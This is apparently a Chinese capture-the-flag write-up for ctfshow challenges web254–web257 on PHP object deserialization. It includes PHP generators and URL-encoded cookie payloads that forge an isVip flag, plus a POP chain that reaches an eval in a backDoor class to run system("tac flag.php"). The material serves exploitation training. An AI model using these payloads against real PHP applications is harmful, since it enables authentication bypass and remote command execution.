web254
username=xxxxxx&password=xxxxxx
web255
<?php
class ctfShowUser{
public $isVip=true;
}
var_dump(serialize(new ctfShowUser()));
?>
运行结果:
string(39) "O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}"
抓包添加信息
/?username=xxxxxx&password=xxxxxx
cookie:user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}"
web256
<?php
class ctfShowUser{
public $isVip=true;
public $username='anything';
}
var_dump(serialize(new ctfShowUser()));
?>
运行结果为:
string(69) "O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}"
编码对象以及结果如下:
O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}
O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A8%3A%22anything%22%3B%7D
Get形传参:
?username=anything&password=xxxxxx
web257
class ctfShowUser{
#无关紧要的值可以删去
private $username='xxxxxx';
private $password='xxxxxx';
private $isVip=false;
#用到了,但是值可以进行变化
private $class = 'info';
#构造方法,创建对象时自动调用此类方法,适合在使用对象时候做一些初始化操作
public function __construct(){
#因为执行代码在blackDoor函数,这儿可以更换成其他函数
$this->class=new info();
}
#不能序列化
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
#对象销毁时自动调用,无关紧要
public function __destruct(){
$this->class->getInfo();
}
}
#没有用到,可以删去
class info{
private $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}
#利用到的类
class backDoor{
#这儿可以对code进行控制
private $code;
#方法不能被序列化,删去
public function getInfo(){
eval($this->code);
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
$user->login($username,$password);
}
#最终代码如下,有个urlencode函数对生成的数组进行加密,因为序列化后会产生%00的截断符号,
#导致不能完整的复制
<?php
class ctfShowUser{
private $class;
public function __construct(){
$this->class=new backDoor();
}
}
class backDoor{
private $code='system("tac flag.php");';
# 要执行的命令
}
var_dump(urlencode(serialize(new ctfShowUser())));
?>
运行结果如下:
string(201) "O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D"